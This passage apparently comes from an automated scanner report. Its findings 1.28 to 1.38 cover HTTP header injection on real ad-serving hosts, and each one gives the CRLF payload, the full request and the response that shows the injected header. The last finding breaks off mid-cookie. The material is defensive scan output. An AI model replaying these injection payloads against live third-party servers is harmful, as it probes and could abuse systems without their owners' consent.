Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9b799
bb53a367fe4/N6092.AOL/B5108587.3;sz=300x250;click=http: //r1-ads.ace.advertising.com/click/site=0000717505/mnum=0000969227/cstr=23267000=_4d588750,4637776738,717505^969227^1183^0,1_/xsxdata=$xsxdata/bnum=23267000/optn=64
Date: Mon, 14 Feb 2011 01:41:22 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.28. http://ad.doubleclick.net/adj/cm.drudgerep/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/cm.drudgerep/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8e2dd%0d%0aaa7cb3ecbf6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8e2dd%0d%0aaa7cb3ecbf6/cm.drudgerep/;net=cm;u=,cm-47449671_1297649419,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.health_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af1-mm.ag1-mm.ai1-mm.al5-mm.am5-mm.ar1-mm.as1-mm.au1-mm.da1-an.51-an.5-ex.32-ex.76-ex.49-dx.16-qc.a;;cmw=owl;sz=300x250;net=cm;ord1=789918;contx=polit;an=300;dc=w;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.rdst11;btg=cm.rdst12;btg=cm.polit_h;btg=cm.health_h;btg=cm.music_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.shop_h;btg=cm.tech_h;btg=cm.ent_h;btg=bk.rdst1;btg=mm.aa5;btg=mm.ad1;btg=mm.af1;btg=mm.ag1;btg=mm.ai1;btg=mm.al5;btg=mm.am5;btg=mm.ar1;btg=mm.as1;btg=mm.au1;btg=mm.da1;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=ex.49;btg=dx.16;btg=qc.a;ord=$cacheBuster$? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8e2dd
aa7cb3ecbf6/cm.drudgerep/;net=cm;u=,cm-47449671_1297649419,11d765b6a10b1b3,polit,cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.rdst11-cm.rdst12-cm.polit_h-cm.health_h-cm.music_h-cm.sports_h-cm.weath_l-cm.shop_h-cm.tech_h-cm.ent_h-bk.rdst1-mm.aa5-mm.ad1-mm.af:
Date: Mon, 14 Feb 2011 02:10:51 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.29. http://ad.doubleclick.net/adj/drudgereport.ilm/remnant [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/drudgereport.ilm/remnant

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 697e6%0d%0a706ed09c5de was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /697e6%0d%0a706ed09c5de/drudgereport.ilm/remnant;;tile=1;sz=728x90;ord= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2ff901.js&size_id=15&account_id=6005&site_id=12414&size=300x250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/697e6
706ed09c5de/drudgereport.ilm/remnant;;tile=1;sz=728x90;ord=:
Date: Mon, 14 Feb 2011 01:52:33 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.30. http://ad.doubleclick.net/adj/pmv.inm.ind/news_home [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/pmv.inm.ind/news_home

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 93ccd%0d%0a389a982e7d5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /93ccd%0d%0a389a982e7d5/pmv.inm.ind/news_home;tile=2;sz=300x250;click=http%3A//adserver.adtech.de/adlink%7C979%7C2440402%7C0%7C529%7CAdId%3D2789559%3BBnId%3D3%3Bitime%3D647360380%3Bkey%3Dworafr%3Blink%3D;ord=647360380? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.independent.co.uk/news/world/africa/is-the-army-tightening-its-grip-on-egypt-2213849.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/93ccd
389a982e7d5/pmv.inm.ind/news_home;tile=2;sz=300x250;click=http: //adserver.adtech.de/adlink|979|2440402|0|529|AdId=2789559;BnId=3;itime=647360380;key=worafr;link=;ord=647360380
Date: Mon, 14 Feb 2011 01:37:54 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.31. http://ad.doubleclick.net/adj/resn.173878/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/resn.173878/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1c8c4%0d%0a0177437432c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1c8c4%0d%0a0177437432c/resn.173878/;alias=epcv0111a;sz=300x250;click=http://yads.zedo.com/ads2/c?a%3D893172%3Bx%3D2333%3Bg%3D172%3Bc%3D794000529%2C794000529%3Bi%3D0%3Bn%3D794%3Bi%3D0%3Bu%3DINmz6woBADYAAHrQ5V4AAACH%7E010411%3B1%3D8%3B2%3D1%3Be%3Di%3Bs%3D5%3Bg%3D172%3Bw%3D47%3Bm%3D82%3Bz%3D0.7725227591581643%3Bk%3D;ord=0.7283410648815334? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=794;c=529/16;s=5;d=9;w=300;h=250
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1c8c4
0177437432c/resn.173878/;alias=epcv0111a;sz=300x250;click=http: //yads.zedo.com/ads2/c
Date: Mon, 14 Feb 2011 01:37:18 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.32. http://ad.doubleclick.net/adj/uk.reuters/news/lifestyle/article [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/uk.reuters/news/lifestyle/article

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 60afd%0d%0a8f5fec5b5f5 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /60afd%0d%0a8f5fec5b5f5/uk.reuters/news/lifestyle/article;type=leaderboard;sz=728x90;tile=1;articleID=UKTRE71C1YB20110213;ord=11111313525264? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://uk.reuters.com/article/2011/02/13/us-bafta-idUKTRE71C1YB20110213
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/60afd
8f5fec5b5f5/uk.reuters/news/lifestyle/article;type=leaderboard;sz=728x90;tile=1;articleID=UKTRE71C1YB20110213;ord=11111313525264:
Date: Mon, 14 Feb 2011 01:36:09 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.33. http://ad.doubleclick.net/adj/wpni.politics [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/wpni.politics

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5c397%0d%0a667e0f07fb was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5c397%0d%0a667e0f07fb/wpni.politics;ad=lb;sz=728x90;pos=ad1;poe=yes;dcopt=ist;ad=pop;ad=interstitial;orbit=y;del=js;t=y;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=disaster;cn=yes;pnode=politics;tile=1;ord=407276147045195100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5c397
667e0f07fb/wpni.politics;ad=lb;sz=728x90;pos=ad1;poe=yes;dcopt=ist;ad=pop;ad=interstitial;orbit=y;del=js;t=y;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=disaster;cn=yes;pnode=politics;tile=1;ord=40727:
Date: Mon, 14 Feb 2011 01:35:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.34. http://ad.doubleclick.net/adj/wpni.politics/inlinead [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/wpni.politics/inlinead

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 53d32%0d%0a19fe23f2faf was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /53d32%0d%0a19fe23f2faf/wpni.politics/inlinead;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=intrusive;!c=disaster;cn=yes;pnode=politics;tile=3;ord=407276147045195100? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wp-dyn/content/article/2011/02/13/AR2011021301463.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/53d32
19fe23f2faf/wpni.politics/inlinead;ad=bb;sz=300x250;pos=inline_bb;poe=yes;orbit=y;del=iframe;fromrss=n;rss=n;heavy=y;page=article;front=n;pageId=wpni-wp-dyn-content-article-2011-02-13-AR2011021301463;articleId=AR2011021301463;!c=intrusive;!c=disaster;cn=yes;pnode=politics;tile=3;ord=40727614:
Date: Mon, 14 Feb 2011 01:38:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.35. http://amch.questionmarket.com/adscgen/sta.php [code parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Issue detail

The value of the code request parameter is copied into the Location response header. The payload 51fdf%0d%0aa355c11c9ff was submitted in the code parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=862189&site=287822477&code=51fdf%0d%0aa355c11c9ff HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://redcated/UNY/iview/287822477/direct/035244?click=http://www.burstnet.com/ads/ad11961a-map.cgi/BCPG176307.255935.305394/VTS=2FHwU.8ZAY/SZ=120X600A|160X600A/V=2.3S//REDIRURL=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 02:16:54 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a208.dl
Set-Cookie: CS1=deleted; expires=Sun, 14-Feb-2010 02:16:53 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1_862189-1-1; expires=Thu, 05-Apr-2012 18:16:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2_862189-9zquM-0; expires=Thu, 05-Apr-2012 18:16:54 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=862189&site=4-287822477-&code=51fdf
a355c11c9ff
Content-Length: 33
Content-Type: text/html

/* /adsc/d862189/4/-1/randm.js */

1.36. http://amch.questionmarket.com/adscgen/sta.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://amch.questionmarket.com
Path:	/adscgen/sta.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e6b37%0d%0aa14210b269c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /adscgen/sta.php?survey_num=862189&site=287822477&code=19855/e6b37%0d%0aa14210b269c4186 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://redcated/UNY/iview/287822477/direct/035244?click=http://www.burstnet.com/ads/ad11961a-map.cgi/BCPG176307.255935.305394/VTS=2FHwU.8ZAY/SZ=120X600A|160X600A/V=2.3S//REDIRURL=
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LP=1297439616; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1; ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2

Response

HTTP/1.1 302 Found
Date: Mon, 14 Feb 2011 02:16:55 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
X-Powered-By: PHP/4.3.8
DL_S: a227.dl
Set-Cookie: CS1=deleted; expires=Sun, 14-Feb-2010 02:16:54 GMT; path=/; domain=.questionmarket.com
Set-Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-2_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-3_39826939-2-1_873085-63-3_39826938-2-1_40554329-9-5_868027-3-2_725047-19-2_40344942-26-1_850799-8-1_39824635-9-1_39992677-13-3_200194931312-3-1_200198267093-2-1_39912095-14-2_600001437951-2-1_39920001-4-1_39920005-4-1_39992639-13-2_851769-1-2_40646325-20-2_40646337-20-3_40586861-11-1_40601181-20-1_39992915-13-1_849772-17-1_849774-17-1_862189-1-1; expires=Thu, 05-Apr-2012 18:16:55 GMT; path=/; domain=.questionmarket.com
Set-Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_853829-y]GsM-Bi1_847435-l^GsM-!"1_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-4|1_866250-M.ktM-1UA_776149-m)mtM-5dA_865889->U$tM-tN_724925-js$tM-J_845473-nE/tM-0_791689-/qcsM-ySg1_848320-~'1uM-0_851229-8(1uM-0_851309-`kNuM-RW_847180-W:OuM-0_853029-8HQuM-2_851769-a(duM-q_850413-*7luM-0_851369-G1vtM-EE@_852149-*jtsM-n<{1_822109-|RIsM-55Y2_862189-AzquM-0; expires=Thu, 05-Apr-2012 18:16:55 GMT; path=/; domain=.questionmarket.com;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Location: http://a.dlqm.net/adscgen/log_ut_err.php?adserver=atlas&survey_num=862189&site=4-287822477-&code=19855/e6b37
a14210b269c4186
Content-Length: 33
Content-Type: text/html

/* /adsc/d862189/4/-1/randm.js */

1.37. http://bidder.mathtag.com/notify [exch parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bidder.mathtag.com
Path:	/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload b7a2e%0d%0a2669694ed50 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /notify?exch=b7a2e%0d%0a2669694ed50&id=5aW95q2jLzEvWlRabVlUbGxaVGt0WXpJeU55MDBOalF3TFRsbU5XRXRObVZpWkRFNE9USXhPREF4L05HUXpOekF5WW1NdE9ETTVaUzB3Tmprd0xUVXpOekF0TTJNeE9XRTVOVFl4TWprMS81OTM0NDM1NTMxNzIwNzUzMS8xMDk0NDkvMTAxNzcyLzUvbThsREliU1ZlNzdkUGpqWXBkdTFCZkNVNWFKNUNxdlZJZHc1OFcxRHRPOC8/G30W_HpUDJzTo5VAvU0finu0Bsc&price=AAABLiHmeN0RSsxpo1GHObFhTeUvm0-oCOAPtQ HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mt_mop=10001:1297389082|1:1297088631|10004:1297088634|11:1297045671|2:1297087036|3:1297045592|4:1296924138|5:1297087118|9:1297087161; uuid=4d3702bc-839e-0690-5370-3c19a9561295; ts=1297647383

Response

HTTP/1.1 404 Not found
Date: Mon, 14 Feb 2011 02:01:37 GMT
Server: MMBD/3.4.3.2
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - b7a2e
2669694ed50
x-mm-host: ewr-bidder-x2
Connection: keep-alive

Request not found

1.38. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into the Set-Cookie response header. The payload 37f57%0d%0a3fb48ff6f67 was submitted in the eyeblaster cookie. This caused a response containing an injected HTTP header.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2204319&PluID=0&w=728&h=90&ord=121268265541127022&ucm=true&ncu=$$http://pixel.mathtag.com/click/img?mt_aid=121268265541127022&mt_id=109450&mt_adid=100341&mt_uuid=4d3702bc-839e-0690-5370-3c19a9561295&redirect=http://www.mediamath.com$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?.s1hABkhFwA1TX4AAAAAAP9.HwAAAAAAAAAAAAYAAAAAAA8AAwABFH32IwAAAAAARqMHAAAAAADDeikAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABeAQ8AAAAAAAIAAwAAAAAAw.UoXI-i8z9cukkMAqv-PwEAAAAAAAVAZmZmZmZmEEABAAAAAAAFQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACy4jPc7mqhCV1QdvLC4KD5ygPw8Rr.jBeWye7lAAAAAA==,,http%3A%2F%2Fwww.drudgereport.com%2F,Z%3D728x90%26s%3D1515801%26r%3D1%26_salt%3D1804486375%26u%3Dhttp%253A%252F%252Fwww.drudgereport.com%252F,6fcbc4c0-37da-11e0-8341-003048d6d89e
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u3=1; C4=; ActivityInfo=000p81bCx%5f; A3=gSdsafy50aSU00003gPVtafzY0bnA00001gDQzahdx07ZZ00001fFb9afAF02WG00001f+JvabEk02WG00002h5iUafy507l00000Sh5j3afvK07l00000.gLnTaeKR09sO00001gYyfadw90cvM00001gL2MadKj0bdR00001gYRSaeKR09sO00001gDa8aeXd0aA900001g7VJafdh08.I00001hghLaeVW09SF00002gFjwaeKR09sO00001gKXMaepH0bdR00001h802ae7k0c6L00001heXeaf5V0c9M00001gYx+adw90cvM00001gKXNaepP0bdR00001gy3.ach00c9M00001heXfagzX0c9M00001heXgagXR0c9M00002h6moagvf0aMN00002gSdkafvD0aSU00001gHrHaeKS09sO00001gK8raeXe0aA900001heXhaf5V0c9M00003heXiagzX0c9M00004gSdmafy60aSU00002gSdnafwN0aSU00003heXjafWs0c9M00001hbwIaeVY09SF00002gvKEacgY0c9M00001heXaaf9P0c9M00001gSdpafvK0aSU00001ge4Gack+0bM000001ge4Hack+0bM000001gNQ4ae7r0c9M00001g+nBaeUD02Hn00001; 